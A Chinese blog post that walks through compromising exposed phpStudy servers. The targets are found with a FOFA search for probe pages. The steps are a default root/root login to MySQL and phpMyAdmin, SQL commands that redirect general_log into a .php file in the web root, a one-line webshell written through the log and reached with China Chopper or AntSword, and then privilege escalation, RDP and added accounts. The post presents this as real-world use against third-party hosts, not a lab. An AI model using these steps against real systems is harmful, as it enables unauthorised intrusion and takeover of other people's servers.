前期准备
1.首先信息收集一波确认目标,:fofa: body=“phpstudy探针” && title=“phpStudy 探针 2014”

2.找几个心仪的目标下手,打开的页面是这样的:

正文
1.记住这个绝对路径,后面用得上,然后页面拉到最后,使用弱口令对MySQL数据库连接进行检测。一般phpstudy默认配置的mysql账号密码为root/root,直接使用这个去尝试登录:

2.但是这种命中率五五开吧,这个不行,就换一个吧,毕竟这个测试,开头还是需要弱口令进去,或者自己也可以跑字典做其他的尝试,显示这样“连接到MySql数据库正常”就是可以的:
访问:http://xxx.xxx.xxx.xxx:88/phpmyadmin
弱口令:root root 登录:

通过SQL指令来操作
show variables like ‘general_log’; – 查看日志是否开启
set global general_log=on; – 开启日志功能
show variables like ‘general_log_file’; – 看看日志文件保存位置
set global general_log_file=‘tmp/general.lg’; – 设置日志文件保存位置
show variables like ‘log_output’; – 看看日志输出类型 table或file
set global log_output=‘table’; – 设置输出类型为 table
set global log_output=‘file’; – 设置输出类型为file
3.查看日志是否开启:show variables like ‘general_log’; – 查看日志是否开启:

4.开启日志:set global general_log=on;

5.查看日志文件保存位置show variables like ‘general_log_file’;

6.修改日志保存路径文件,注意要准确到文件名:set global general_log_file=’ D:/WWW/aaa.php’; //根据实际情况来定:

7.更简单一点的方法,在变量处,找到general_log、general_log_file,然后general_log改成ON、general_log_file改为网站根目录下的文件名:

8.然后通过日志来写一句话:

9.通过菜刀或者蚁剑连接一句话木马:

10.之后根据不同服务器状况采取不同选择,例如提权、开启3389、添加用户。
一个弱口令拿下shell(实战)
最新推荐文章于 2024-04-28 18:11:11 发布
本文介绍如何通过PHPStudy探针进行信息收集、利用弱口令登录MySQL,并演示了如何通过SQL指令操作日志记录,最终实现对目标系统的进一步攻击。
1021

被折叠的 条评论
为什么被折叠?



